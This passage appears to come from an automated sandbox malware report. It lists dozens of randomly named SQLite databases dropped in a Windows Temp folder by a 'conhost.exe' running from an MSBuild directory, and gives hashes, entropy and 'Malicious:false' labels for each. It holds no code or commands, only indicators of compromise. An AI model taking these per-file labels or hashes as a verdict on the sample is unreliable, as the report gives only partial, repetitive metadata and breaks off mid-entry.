                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\UldxNUOpgA

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Uyp5F18egV

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\V50nUUP70f

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\V7XD663msp

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Vk3Mw1W2Qt

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\VyJoKrdJMr

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\W7mQTfLiwC

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\WGoFBNvEfo

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\WHJxM6AYOO

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\WbsJo8BSbk

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\X1XyXuc1da

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\X7ug62kExG

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\XInuknzGr5

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\XJFf8mDCqH

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\XQUBwTn67Y

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\XSaeMjsDfA

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\XhE7H3lWiP

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\XmwhVYgp79

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\XrYw0FZllb

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Y2G0PM3AJh

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\YCPE8fxbBu

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\YMuthXahhK

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\YW0xy0wJbX

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Yk8nNAmod6

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
